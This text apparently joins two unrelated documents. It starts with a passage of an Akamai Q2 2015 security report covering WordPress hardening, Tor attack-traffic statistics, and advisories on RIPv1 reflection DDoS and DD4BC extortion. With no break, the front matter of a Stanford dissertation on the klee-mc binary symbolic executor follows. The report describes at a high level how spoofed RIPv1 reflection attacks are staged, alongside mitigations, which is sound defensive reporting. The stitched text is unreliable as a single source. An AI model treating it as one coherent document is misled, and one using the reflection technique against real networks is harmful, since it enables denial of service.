options that will help protect you against potential vulnerabilities in the wild 
now and in the future. Some general tips would be to look into hardened php  
implementations such as Suhosin  and consider a system like phpids to help 
identify potential weaknesses and attacks and prevent them from being successfully exploited. There are configuration options at the server level for performance tuning 
and security hardening, such as ModSecurity, that will aid in mitigating attacks before they begin, making exploitation more difficult, if not impossible.
In our research, we came across multiple security-oriented WordPress plugins, 
most of which appeared to be well-secured themselves from a programming and vulnerability standpoint, as well as helpful in enabling best practice protections for 
a wide array of potential vulnerabilities. Some of the plugins that stood out, not only 
from a quality standpoint, but also by virtue of popularity and good reviews, were Wordfence , iThemes Security , and All In One Security & Firewall. These plugins 
help identify weaknesses within your existing installation and offer information, advice, modifications and features that should help prevent some of the most common attacks leveraged against WordPress installations.
Criminals are increasingly targeting web application vulnerabilities as a means for data 
exfiltration, malware distribution and Botnet development. Web application firewalls and due diligence are quickly becoming a requirement for any individual or company 
who relies on a website and wants to ensure security and reliability for their users. [SECTION]3 = CASE STUDY
[SECTION ]4
Tor: THE PROS
AND CONS
The Onion Router (Tor) concept was a Defense Advanced Research 
Projects Agency (darpa ) project that was originally created to enable us  
Navy personnel to conduct Open Source Intelligence (osint) operations 
without disclosing their source ip addresses, and potentially their location. A few years afterwards, a group of computer scientists implemented it, and the us Naval 
Research Laboratory released it as open source software.
59 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
60 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
The Tor project uses a concept called onion routing, which ensures the entry node 
to the network is not the same as the exit node. This process creates anonymity for 
the client when interacting with the destination system. By hopping among internal 
nodes, it could theoretically be impossible to detect the origin of the request. However, a number of cyberattacks have attempted to unmask Tor users, using 
network analysis , metasploit  and relay early cells.
Due to the promise of anonymity, Tor became popular among diverse 
groups including:
  • People under censorship who seek access to information
  • People who care about their privacy and do not want to be tracked
  • Malicious actors who want to hide their location from law enforcement
The benefit of anonymity for Tor users is obvious; however, its value is not the 
same for website owners. There are many industries, such as financial services, that employ user-profiling techniques to help prevent fraud. The Tor network 
complicates this process. On the other hand, many ecommerce sites don’t place 
importance on where users originate as long as they provide valid credit card data when purchasing their products. 
The question becomes, should you allow connections from Tor to your website?  As 
outlined above, it is highly dependent upon your business model and risk tolerance. 
In the next section, we provide analysis that shows the overall risk of malicious 
traffic emanating from Tor vs. non-Tor traffic.
4.1 / Tor, the Foes / Attackers use Tor to perform anonymous attacks by hopping 
from node to node, thus making forensic analysis and origin traceback a nightmare 
for law enforcement. There are many guides on the Internet on how to configure Tor 
as a local socks proxy for any application that provides socks proxy support. [SECTION]4 = TOR THE PROS AND CONS
61 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
Moreover, many attack tools 
include  easy-to-configure 
Tor capabilities. A notable 
example is the common sql  
Injection tool, sqlmap , which 
includes  a  command  line argument to enable Tor. There is even a 
check-tor  
command line switch that verifies Tor is configured properly before staging an attack.2
4.2 / Risk Analysis / In order to assess the risks involved with allowing Tor traffic to websites, we observed web traffic across the Kona security customer base 
during a seven-day period. During that time, we collected relevant traffic data from 
thousands of web applications for approximately 3,000 Akamai customers.
Denial of Service (DoS) and Rate Control triggers were not considered for this 
research. The nature of the Tor network severely limits available bandwidth. It is 
not feasible to conduct volumetric DoS attacks via Tor. Instead, we concentrated on high-profile web application layer attacks from the following categories:Defendant LOVE and the other  
Co-Conspirators further used the Tor 
network, which was an anonymizing 
proxy service, to hide their activities.
—  Indictment for US vs. Lauri Love. Love  was charged with 
hacking into thousands of computer systems, including those of the US Army and NASA, in an alleged attempt  
to steal confidential data.
1 [SECTION]4 = TOR THE PROS AND CONS
  Figure 4-1: The check_tor  switch is enabled, causing the tool to add time to stage the 
attack as it hops between nodes
,,
62 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
Command Injection (CMDi) - Command injection attacks allow malicious actors 
to execute arbitrary shell commands on the target system. For this report, CMDi 
includes the following subcategories:
  • php code injection (PHPi)
  • Java code injection (JAV Ai)
  • Command injection through remote file inclusion (rfi )
Local File Inclusion/Path Traversal (lfi/pt) — Using lfi attacks, malicious actors 
gain unauthorized read access to local files on the web server.
Web vulnerability scanning — Web vulnerability scanners search websites for 
known application vulnerabilities. Vulnerability scanners are used by attackers to perform reconnaissance prior to launching attacks.
sql Injection (SQLi) — SQLi attacks allow attackers to pass content to a backend 
sql server without proper validation or sanitization.
Cross-Site Scripting (xss ) — xss attacks inject attacker-supplied content or script 
into the end user’s http response, which is then rendered on the visited website.
4.3 / Tor Traffic vs. Non-Tor Traffic / Because Tor provides a way to 
overcome censorship, perform osint and to protect an individual’s privacy, traffic 
coming out of Tor will not necessarily be malicious.
However, Tor also provides a layer of anonymity that malicious actors may exploit. 
Many Akamai customers ask, “If my site accepts traffic from Tor exit nodes, what are 
the risks involved?” Or, “What are the odds that an http request coming out of a Tor 
exit node will be malicious?”
To answer these questions, we started by comparing the total non-attack http  
requests coming out of Tor exit nodes vs. non-Tor IPs, as shown in Figure 4-2. [SECTION]4 = TOR THE PROS AND CONS
63 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
It should be noted that the requests counted in this research represent only client 
requests that eventually reached the target site and do not include requests to static 
media files such as JavaScript, css, images, movies and sounds clips.
Global Rank Legitimate HTTP Requests Frequency
Non-Tor IPs  534,999,725,930 99.96%
Tor exit nodes 228,436,820 00.04%
 Figure 4-2: Of the legitimate HTTP requests, excluding static media files, less than 1% were 
from Tor exit notes 
Source Legitimate HTTP Requests  Frequency
Non-Tor IPs  46,530,841 98.74%
Tor exit nodes 596,042 1.26%
 Figure 4-3: Of the malicious HTTP requests, 1.26% were from T or exit notes
Source Ratio Between Malicious & Legitimate Traffic Frequency
Non-Tor IPs 0.00008697% malicious traffic  ~1:11,500
Tor exit nodes 0.00260922% malicious traffic ~1:380
 Figure 4-4: Though the traffic levels are much smaller, Tor exit nodes were much more likely 
to contain malicious requests [SECTION]4 = TOR THE PROS AND CONS
We then counted (and verified) the attack http requests, based on the categories 
mentioned earlier, as shown in Figure 4-3.
We then set to compare the ratios of malicious and legitimate traffic for each.
Using the information collected in our sample period for the attack categories 
studied, we concluded that approximately 1 in 380 http requests coming out of Tor is verified to be malicious, while only 1 in 11,500 http requests coming out of a non-
Tor ip were verified to be malicious. In essence, an http request from a Tor ip is 30 
times more likely to be a malicious attack than one that comes from a non-Tor ip .
64 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
4.4 / Tor Attacks by Category / It is no surprise that we have a similar 
distribution of attack types between Tor exits nodes and non-Tor IPs for our 
analyzed categories, as shown in Figure 4-5.
40
353025201510
50
PT Scanners
Vulnerability
Scanners
SQLi
XSS
CMDiTor Exit Nodes Non-Tor IPs
  Figure 4-5: As with Tor exit nodes, PT and SQLi attacks were the most common attack 
vectors from non-Tor IPsTor Web Application Attacks by Category [SECTION]4 = TOR THE PROS AND CONS
65 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
4.5 / Tor Attack Distribution by Target Industry / The most common 
target for Tor attacks was the retail industry, followed by financial services and 
high technology. [SECTION]4 = TOR THE PROS AND CONS
Industry Number of Attacks Frequency
Retail 212,189 35.60%
Financial Services 156,760 26.30%
High Technology 123,442 20.71%
Media & Entertainment 49,834 8.36%
Public Sector 34,800 5.84%
Hotel & Travel 5,919 0.99%
Business Services 5,241 0.88%
Automotive 3,942 0.66%
Consumer Goods 2,767 0.46%
Gaming 813 0.14%
Miscellaneous 335 0.06%
Figure 4-6: During the study period, Tor-based attacks targeted the retail industry
most frequently
4.6 / Tor Attack Distribution by Target Country / Figure 4-7 identifies the 
target country of the Tor attacks during the study period, based on Akamai billing data.
An interesting fact about the difference in attacks on us-based sites and the rest of 
the world is that us-site attacks were distributed across many Akamai customers, while the attacks against the rest of the world were distributed among only a handful 
of Akamai customers in each geographic area.
For example, the Tor attacks on Swiss-based sites targeted a single digital property. 
Similarly, the Tor attacks in the uk targeted just two customers.
4.7 / Potential Impact on Business / Another useful metric to understand the 
risks of allowing or disallowing Tor traffic is the index of conversion . We measured 
all the requests on a given day, both from Tor and non-Tor exit nodes.
66 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
We then measured the number of requests to key commerce-related application 
pages such as checkout and payment pages (limited to post  requests) on the given 
day from Tor exit nodes, vs. the same pages from non-Tor IPs.Country Number of Attacks Frequency
US 239,953 40.26%
Switzerland 210,601 35.33%
UK 125,167 21.00%
Canada 7,676 1.29%
Israel 5,485 0.92%
Austria 2,686 0.45%
Spain 888 0.15%
Germany 831 0.14%
Netherlands 702 0.12%
France 515 0.09%
Brazil 478 0.08%
Japan 243 0.04%
Greece 239 0.04%
Australia 231 0.04%
China 211 0.04%
Korea 79 0.01%
India 25 0.004%
Taiwan 19 0.003%
Bermuda 12 0.002%
Sweden 1 0.0002%
Figure 4-7: Targets in the US, Switzerland and UK accounted for more than 96% of Tor 
attacks during the study period [SECTION]4 = TOR THE PROS AND CONS
Source Legitimate HTTP Requests
Non-Tor IPs  79,255,900,946
Tor exit nodes 35,560,027
 Figure 4-8: Legitimate HTTP requests for one day of the study period
As can be seen from the conversion rates in Figure 4-9, while the Tor network 
presents very high risk to web sites from a security perspective, it also yields potential 
business benefits to some industries.
67 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
Retail and financial services typically employ powerful fraud analysis and prevention 
methods. Web applications in these industries will most likely profile individual 
users and the web transactions they generate, whether or not traffic arrived from 
Tor. In most cases, it is just another indicator for the overall risk calculation, and at the end of the day, Tor traffic is allowed through.
4.8 / Summary / As can be expected from any anonymizing tool, the Tor network 
can be considered a double-edged sword. While it provides a blanket of anonymity 
and helps Internet users anonymize themselves from prying eyes, it also provides a 
safe haven for malicious actors who want to exploit anonymity in order to perform illegitimate actions against web applications. 
Many research papers and news articles have proven that the Tor network brings 
a wide range of risks, but at the same time, most of them completely avoid the fact that there is also business potential to allowing Tor users to browse revenue-
generating websites. 
For some sites, the risks that come with allowing Tor traffic are much higher than 
the benefit, a risk many organizations fail to consider. Regardless, it is highly recommended that traffic coming out of Tor either be heavily scrutinized by security 
protections (such as those provided by Akamai Kona Site Defender) or completely 
blocked if the risk outweighs the benefits to the business. Akamai provides a constantly-updated Tor exit node shared network list, which Kona customers can 
use to alert or block as part of their site’s protection.SourceLegitimate HTTP Requests to 
Commerce-Related Application PagesConversion Rate
Non-Tor IPs 95,017,641  (1:834)
Tor exit nodes 39,703 (1:895)
 Figure 4-9: Requests from Tor exit nodes remain valuable, as the conversion rates show [SECTION]4 = TOR THE PROS AND CONS
[SECTION ]5
CLOUD SECURITY
RESOURCES
Akamai released five threat advisories in q 2 2015, as summarized here. 
5.1 / OurMine Team Attack Exceeds 117 Gbps / Akamai’s PLXsert 
and csirt are tracking the activities of a malicious hacking team that 
calls itself the OurMine Team. The group claims to be responsible for DDoS attacks 
against a number of financial institutions, and claims to have access to a financial 
organization’s accounts worth US $500,000 that they intend to give to the poor.
68 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
69 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
This is a relatively new group, which started its Twitter account March 31, 2015. 
Before it started targeting the financial sector, the group generally discussed and 
conducted DDoS attacks against gaming services.
Akamai validated several DDoS attacks across the financial sector, though no 
outages have been reported from the major institutions across our customer base. 
The largest attack peaked at 117 Gbps.
While this group is self-aggrandizing and entices Twitter followers with offers of 
free online gaming accounts or gaming coins (such as fifa Ultimate Team and 
Minecraft) for reaching milestones in its follower base, this does not diminish its 
credibility. OurMine typically does not announce target lists in advance, but instead announces when an attack is underway or has been completed.
OurMine may have colleagues within the hacking community, based on various posts 
identified via Twitter and other osint resources. However, it appears that the group’s 
core competency was gleaned within the gaming community. Though the group 
has demonstrated some skill, it appears to be relatively inexperienced in hacking.
The public requests for assistance in the targeting of video games, coupled with 
their schemes to gain Twitter followers, would suggest that this actor set is 
unskilled. However, their success with a number of sizeable DDoS attacks seemingly 
contradicts that notion.
5.2 / RIPv1 Reflection DDoS Makes a Comeback / Late in the quarter, Akamai 
observed an uptick in a DDoS reflection vector that was thought to be mostly 
abandoned. This attack vector involves the use of an outdated Routing Information Protocol (rip ), RIPv1. This first surfaced in active campaigns on May 16, after being 
dormant for more than a year. The attacks made use of only a small number of available RIPv1 source devices. [SECTION]5 = CLOUD SECURITY RESOURCES
70 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
RIPv1 was first introduced in 1988 under RFC1058, which is now listed as a historic 
document in RFC1923. The historic designation means the original rfc  is deprecated. 
One reason for this is that RIPv1 only supports classful networks. If the network advertised by RIPv1 happens to be a class A network, such as 10.1.2.0/24, this will be sent in an advertisement as 10.0.0.0/8. The small number or available addresses 
(128) limits the usefulness for RIPv1 as a viable option for business networks, 
much less the Internet. However, RIPv1 is considered to be a quick and easy way to dynamically share route information in a smaller, multi-router network.
A typical router communication would appear as shown in the table below. Here, 
a request is sent by a router running rip  when it is first configured or powered on. 
Any other device listening for the requests will respond to this request with a list of 
routes. Updates are also sent periodically as broadcasts.
To leverage the behavior of RIPv1 for DDoS reflection, a malicious actor crafts the 
same request query type as shown in Figure 5-1, which is normally broadcast, and 
spoofs the ip address source to match the intended attack target. The destination would match an ip from a list of known RIPv1 routers on the Internet. Based on 
recent attacks, attackers prefer routers that seem to have a suspiciously large amount 
of routes in their RIPv1 routing table.
This query results in multiple 504-byte payloads sent to a target ip per a single 
request. The multiple responses are also a result of the 25-route max that can be 
contained in a rip  packet.   Figure 5-1: Normal router communications for RIPv1Router initial request for routes (sent as broadcast):
15:53:50.015995 IP 192.168.5.2.520 > 255.255.255.255.520: RIPv1, Request, length: 24
Listening router response for routes (sent as a unicast reply to request IP):
15:53:50.036024 IP 192.168.5.1.520 > 192.168.5.2.520: RIPv1, Response, length: 24
Regular periodic update sent every 30 seconds by default (broadcast):
15:54:26.448383 IP 192.168.5.1.520 > 255.255.255.255.520: RIPv1, Response, length: 24 [SECTION]5 = CLOUD SECURITY RESOURCES
71 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
There are several ways to avoid becoming a victim of this attack method:
  •  If RIPv1 is required, assess the need to expose rip  on your wan  interface. If 
it’s not needed, the wan  interface should be marked as a passive interface 
(where supported). 
  •  Switch to RIPv2 or later and enable authentication.
  •  Restrict access to rip  via acl , to only allow known neighbor routers.
  •  For targets of a RIPv1 reflected DDoS attack, use acl  to restrict udp  source 
port 520 from the Internet. 
  •  If the attack is too large, seek assistance from a DDoS mitigation provider such 
as Akamai Technologies.
5.2A / Third-Party Plugins Ripe for Attack / In Section 3 of this report, we described 
how WordPress users can be vulnerable to attacks via the third-party plugins they 
use. But the threat goes beyond WordPress users.
Most high-profile websites have a strong security profile. But many of them also 
use third-party content providers whose security may be less than ideal. Instead of 
targeting high-traffic websites directly, attackers are targeting third-party advertising 
companies, as well as content networks used by these sites. Such exploits require little technical skill and are highly effective.
Akamai csirt Manager Mike Kun described the problem in this podcast recently.
“Bad actors are looking at what services the website is using, ” Kun said. “ A simple 
one is dns . If the attacker can compromise the registrar a site is hosted with, they 
can easily change the ip address mapping and point that at some other site. ”  [SECTION]5 = CLOUD SECURITY RESOURCES
72 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
The method of attack against the third party may be through domain hijacking, 
phishing, application-layer attacks or any of the various methods to compromise 
a provider. Once that provider is compromised, there isn’t anything more the 
attacker needs to do in order for their target to be attacked. The third-party provider unwittingly does it for them.
Attackers will also look at what content is being dynamically included in a site, and 
try to compromise one of those providers. If the target site blindly trusts the content being sent from a provider, the attacker knows the site can be compromised with 
malicious content sent by the provider.
The attack code will frequently be a form of malware viewers unwittingly load onto 
the site. If the targeted site gets millions of views per day, a significant botnet can be 
created in a short amount of time.
Those who manage a major website put a lot of effort into fortifying the front 
entrance. But using third-party content without proper security is like leaving open 
windows in the back of the building. 
The best defense in this situation is proper planning.What happens to the site when a plugin will not load? Will the rest of the page load 
around it correctly? Or does the whole site wait for the plugin code to be delivered, 
effectively creating a DoS condition for the site?
Consider what to do if the plugin is compromised. What is the plan to eliminate the 
plugin but keep the site running? One possibility is to have a static version of the 
site ready to go, so no dynamic code is pulled in that could continue to compromise the site or customers or both.
Obviously, the best scenario is one in which these things don’t happen in the first place. [SECTION]5 = CLOUD SECURITY RESOURCES
73 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
To that end, we recommend site owners research the plugins they want to use before 
deploying them. Ask third-party providers what they use for security measures. 
If their response is less than ideal, find another provider that will address the 
concerns more clearly.
5.2B / The Logjam Vulnerability  / In May, Akamai responded to concerns over the 
Logjam vulnerability as discussed in this disclosure . Akamai analyzed its production 
servers to determine if it supported the relevant Diffie-Hellman ciphers that would 
leave customers vulnerable to Logjam. 
Akamai determined that hosts on its Free Flow and Secure Content Delivery 
Networks were not vulnerable. Akamai did recommend people read this OpenSSL 
post on changes related to Logjam and freak. Akamai also recommended customers 
check their origin and advised anyone using a web browser, running a server or 
developing relevant software read the What should I do? section of this advisory . 
5.2C / DD4BC Escalates Attacks / q2 2015 was dominated by attacks launched by 
the group DD4BC. 
DD4BC, a malicious group responsible for several Bitcoin extortion campaigns in 
2014, expanded its extortion and DDoS campaigns during April and May. Akamai had to protect a growing number of customers from these attacks.
Over the course of one week, several customers received ransom emails in which 
DD4BC warned they’ d launch a DDoS attack of 400-500 Gbps against them. To date, however, DD4BC attacks mitigated by Akamai haven’t measured more than 50 Gbps. [SECTION]5 = CLOUD SECURITY RESOURCES
74 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
Based on these attacks and the correlating ip addresses, Akamai researchers 
identified more than 1,400 IPs that were likely coming from booter-stresser sites. 
The growing number of industries under threat include:
  • Payment processing
  • Banking & credit unions
  • Gaming  • Oil & gas
  • E-commerce
  • High tech consulting/services
Customers should:
  •  Review your playbook with it and security staff to ensure you are prepared 
and know what to do in the event of an attack.
  •  Ensure all contact numbers and email addresses for key staff have been updated 
and are correct.
  •  Ensure all critical staff are available. If staff members are on vacation or absent 
due to sickness, make sure their responsibilities are covered by others.
  •  Stay in close contact with the Akamai soc and check the Akamai Community 
Security page for updates.
Companies were also advised to:
  •  Make security incident preparation a corporate-wide initiative.
  •  Keep it management in the loop about potentially controversial corporate 
dealings or policies with social justice or political overtones. [SECTION]5 = CLOUD SECURITY RESOURCES
75 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
  •  Stay informed about security vulnerabilities and DDoS attack trends.
  •  Validate mitigation services.
  •  Create and test security playbooks.
  •  Monitor social media.
  •  Monitor corporate-sponsored social media pages, blogs and message boards 
for inflammatory postings by customers and employees.
  •  Alert it and security services providers when the company becomes a live 
target and take defensive action.
  •  Pay attention to threatening emails and phone calls.
  •  Alert law enforcement. [SECTION]5 = CLOUD SECURITY RESOURCES
[SECTION ]6
LOOKING FORWARD
We expect to see a continued upward trend of long-duration DDoS 
attacks. While this quarter saw one attack that measured more than 
240 Gbps and lasted more than 13 hours, we expect to see future 
attacks surpass those levels.
Malicious actors such as DD4BC and the OurMine Team continue to be persistent 
and creative. While Akamai will continue to protect customers from their assaults, 
they have had enough success elsewhere that they will continue to push forward. Their numbers and array of attack tools will likely increase going forward, making 
bigger attacks inevitable. 
76 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
77 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
We also expect the syn  and ssdp  vectors to remain popular. The proliferation of 
unsecured home-based, Internet-connected devices using the Universal Plug and 
Play (UPnP) protocol will ensure that they remain attractive for use as ssdp  reflectors.
Expect the heavy barrage of attacks in the gaming industry to continue, as players 
keep looking for an edge over competitors, and security vulnerabilities in gaming 
platforms continue to attract attackers looking for low-hanging fruit. Financial 
services will also remain a top target given the myriad opportunities the bad guys have to extract and monetize sensitive data.
us-based websites will likely remain the most targeted for web application attacks 
given the sheer number of devices, users and vulnerabilities.
We will also continue to see malware in ads and third-party service attacks as 
attackers continue to find security holes in the many widgets and plug-ins used 
across myriad platforms. 
Collaboration continues to be an imperative for the software and hardware 
development industry, application and platform service providers, and the 
security industry in order to break the cycle of mass exploitation, botnet building and monetization.  [SECTION]6 = LOOKING FORWARD
78 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
1 http://www.justice.gov/sites/default/files/usao-nj/legacy/2013/11/29/Love,%20Lauri%20Indictment.pdf
2 https://github.com/sqlmapproject/sqlmap/wiki/Usage [END NOTES]
About Prolexic Security Engineering & Research Team 
(PLXsert)
PLXsert monitors malicious cyber threats globally and analyzes these 
attacks using proprietary techniques and equipment. Through research, digital forensics and post-event analysis, PLXsert is able to build a global 
view of security threats, vulnerabilities and trends, which is shared with 
customers and the security community. By identifying the sources and associated attributes of individual attacks, along with best practices to 
identify and mitigate security threats and vulnerabilities, PLXsert helps 
organizations make more informed, proactive decisions.
About Threat Research Team 
The Threat Research Team is responsible for the security content and protection logic of Akamai’s cloud security products. The team performs 
cutting edge research to make sure that Akamai’s cloud security products 
are best of breed, and can protect against the latest application layer threats.
About Customer Security Incident Response Team (csirt)
The Akamai Customer Security Incident Response Team (csirt)  researches attack techniques and tools used to target our customers and 
develops the appropriate response — protecting customers from a wide 
variety of attacks ranging from login abuse to scrapers to data breaches to 
Dns hijacking to distributed denial of service. It’s ultimate mission: keep 
customers safe. As part of that mission, Akamai Csirt maintains close 
contact with peer organizations around the world, trains Akamai’s PS and CCare to recognize and counter attacks from a wide range of adversaries, 
and keeps customers informed by issuing advisories, publishing threat 
intelligence and conducting briefings.
Contact
Twitter: @State_InternetEmail: stateoftheinternet-security@akamai.com 
©2015 Akamai Technologies, Inc. All Rights Reserved. Reproduction in whole or in part in any form or medium without express written permission is prohibited. Akamai and the Akamai 
wave logo are registered trademarks. Other trademarks contained herein are the property of their respective owners. Akamai believes that the information in this publication is accurate as of its 
publication date; such information is subject to change without notice. Published 08/15.Akamai is headquartered in Cambridge, Massachusetts in the United States with operations in more than 57 offices around the world. Our services and renowned customer care are 
designed to enable businesses to provide an unparalleled Internet experience for their customers worldwide. Addresses, phone numbers and contact information for all locations are listed on www.akamai.com/locations.As the global leader in Content Delivery Network (cdn ) services, Akamai makes the Internet fast, reliable and secure for its customers. The company’s advanced web performance, mobile 
performance, cloud security and media delivery solutions are revolutionizing how businesses optimize consumer, enterprise and entertainment experiences for any device, anywhere. To learn 
how Akamai solutions and its team of Internet experts are helping businesses move faster forward , please visit www.akamai.com  or blogs.akamai.com, and follow @Akamai  on Twitter. METHODS FOR BINARY SYMBOLIC EXECUTION
A DISSERTATION
SUBMITTED TO THE DEPARTMENT OF COMPUTER SCIENCE
AND THE COMMITTEE ON GRADUATE STUDIES
OF STANFORD UNIVERSITY
IN PARTIAL FULFILLMENT OF THE REQUIREMENTS
FOR THE DEGREE OF
DOCTOR OF PHILOSOPHY
Anthony Romano
December 2014
Abstract
Binary symbolic execution systems are built from complicated stacks of unreliable
software components, process large program sets, and have few shallow decisions.
Failure to accurately symbolically model execution produces infeasible paths which
are difficult to debug and ultimately inhibits the development of new system features.
This dissertation describes the design and implementation of klee-mc , a novel binary
symbolic executor that emphasizes self-checking and bit-equivalence properties.
This thesis first presents cross-checking for detecting causes of infeasible paths.
Cross-checking compares outputs from similar components for equivalence and reports
mismatches at the point of divergence. This approach systematically finds errors
throughout the executor stack from binary translation to expression optimization.
The second part of this thesis considers the symbolic execution of floating-point
code. To support floating-point program instructions, klee-mc emulates floating-
point operations with integer-only off-the-shelf soft floating-point libraries. Symbol-
ically executing these libraries generates test cases where soft floating-point imple-
mentations and floating-point constraint solvers diverge from hardware results.
The third part of this thesis discusses a term rewriting system based on program
path derived expression reduction rules. These reduction rules improve symbolic
execution performance and are machine verifiable. Additionally, these rules generalize
through further processing to optimize larger classes of expressions.
Finally, this thesis describes a flexible mechanism for symbolically dispatching
memory accesses. klee-mc forwards target program memory accesses to symbolically
executed libraries which retrieve and store memory data. These libraries simplify
access policy implementation and ease the management of rich analysis metadata.
iv
Acknowledgements
Foremost, I would like to thank my thesis advisor Dawson Engler for his often frustrat-
ing but invariably insightful guidance which ultimately made this work possible. His
unwaning enthusiasm for developing neat system software is perhaps only matched
by his compulsion to then break said software in new and interesting ways.
The other two-thirds of my reading committee, Alex Aiken and David Mazi` eres,
helpfully and recklessly agreed to trudge through over a hundred pages of words about
binary symbolic execution.
Although the vast majority of this work was my own, several people did contribute
some code in one way or another. klee-mc depends on a heavily modified derivative
of the klee symbolic executor, originally developed by Daniel Dunbar and Cristi
Cadar in Dawson’s lab shortly before my time at Stanford.T.J. Purtell helped develop
an early version of the machine code to LLVM dynamic binary translator. James
Knighton assisted in creating a public web interface for the system. David Ramos
wrote a few klee patches that I pulled into klee-mc early on; he once casually
remarked the only way to check these systems is mechanically.
This research was partially supported by DARPA award HR0011-12-2-009 and the
DARPA Clean-slate design of Resilient, Adaptive, Secure Hosts (CRASH) program
under contract N66001-10-2-4089. This work was also supported in part by the US
Air Force through contract AFRL-FA8650-10-C-7024. Any opinions, findings, con-
clusions, or recommendations expressed herein are those of the author, and do not
necessarily reflect those of the US Government, DARPA, or the Air Force.
v
Contents
Abstract iv
Acknowledgements v
1 Introduction 1
1.1 Motivation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
1.2 Challenges in Symbolic Execution . . . . . . . . . . . . . . . . . . . . 3
1.2.1 Accuracy and Integrity . . . . . . . . . . . . . . . . . . . . . . 4
1.2.2 Floating-Point Code . . . . . . . . . . . . . . . . . . . . . . . 5
1.2.3 Expression Complexity . . . . . . . . . . . . . . . . . . . . . . 5
1.2.4 Memory Access Analysis . . . . . . . . . . . . . . . . . . . . . 6
1.3 Contributions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
2 The klee-mc Binary Program Symbolic Executor 10
2.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
2.2 Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
2.2.1 Symbolic Execution . . . . . . . . . . . . . . . . . . . . . . . . 11
2.2.2 Binary Symbolic Execution . . . . . . . . . . . . . . . . . . . 14
2.3 Generating Tests with klee-mc . . . . . . . . . . . . . . . . . . . . . 16
2.4 Design of klee-mc . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
2.4.1 Program Snapshots . . . . . . . . . . . . . . . . . . . . . . . . 18
2.4.2 Dynamic Binary Translation . . . . . . . . . . . . . . . . . . . 21
2.4.3 Expressions and Solving . . . . . . . . . . . . . . . . . . . . . 27
2.4.4 Scheduling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
vi
2.4.5 Runtime Libraries . . . . . . . . . . . . . . . . . . . . . . . . . 33
2.4.6 Limitations . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
2.5 Experiments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
2.5.1 Snapshots . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
2.5.2 Program Tests and Bugs . . . . . . . . . . . . . . . . . . . . . 43
2.5.3 Coverage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
2.6 Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
3 Machine Cross-Checking 49
3.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
3.2 Motivation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50
3.2.1 Bad Paths . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
3.2.2 System Complexity . . . . . . . . . . . . . . . . . . . . . . . . 52
3.3 Cross-Checking in klee-mc . . . . . . . . . . . . . . . . . . . . . . . 54
3.3.1 Deterministic Executor Data . . . . . . . . . . . . . . . . . . . 54
3.3.2 Operating System Differencing on the System Model . . . . . 59
3.3.3 Execution Testing with Deterministic Test Replay . . . . . . . 61
3.3.4 Host CPU and the Machine Code Front-End . . . . . . . . . . 63
3.3.5 Constraint Validity for Expressions and Solvers . . . . . . . . 65
3.4 Implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 68
3.4.1 Static Non-determinism . . . . . . . . . . . . . . . . . . . . . 68
3.4.2 Dynamic Non-determinism . . . . . . . . . . . . . . . . . . . . 68
3.5 Experiments and Evaluation . . . . . . . . . . . . . . . . . . . . . . . 69
3.5.1 Linux Program Test Cases . . . . . . . . . . . . . . . . . . . . 70
3.5.2 Machine Code Front-End . . . . . . . . . . . . . . . . . . . . . 73
3.5.3 System Model . . . . . . . . . . . . . . . . . . . . . . . . . . . 76
3.5.4 Expressions . . . . . . . . . . . . . . . . . . . . . . . . . . . . 78
3.6 Related Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
3.7 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82
4 Off-the-Shelf Symbolic Floating-Point 84
4.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
vii
4.2 Related Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86
4.3 Soft Floating-Point . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88
4.3.1 Floating-Point Operations . . . . . . . . . . . . . . . . . . . . 88
4.3.2 Runtime Libraries . . . . . . . . . . . . . . . . . . . . . . . . . 90
4.4 Operation Integrity . . . . . . . . . . . . . . . . . . . . . . . . . . . . 93
4.4.1 Gathering Test Cases . . . . . . . . . . . . . . . . . . . . . . . 95
4.4.2 Cross-Checking for Consistency: Interpreter ×JIT . . . . . . 97
4.4.3 Cross-Testing for Underspecification Bugs . . . . . . . . . . . 98
4.4.4 Common Pitfalls . . . . . . . . . . . . . . . . . . . . . . . . . 102
